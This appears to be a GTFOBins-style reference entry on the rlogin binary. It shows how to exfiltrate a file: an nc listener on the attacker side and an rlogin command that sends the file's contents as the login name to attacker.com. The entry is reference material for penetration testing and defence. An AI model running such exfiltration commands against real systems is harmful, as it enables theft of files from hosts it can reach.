~/Privilege Escalation/Linux/Binaries# cat rlogin.md █
Usually rlogin
is a symlink to ssh
, the following works only when the real rlogin is used (e.g., from the rsh-client
APT package).
File upload
It can exfiltrate files on the network.
Send contents of a file to a TCP port. Run nc -l -p 12345 > "file_to_save"
on the attacker system to capture the contents.
rlogin hangs waiting for the remote peer to close the socket.
The file is corrupted by leading and trailing spurious data.
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
rlogin -l "$(cat $LFILE)" -p $RPORT $RHOST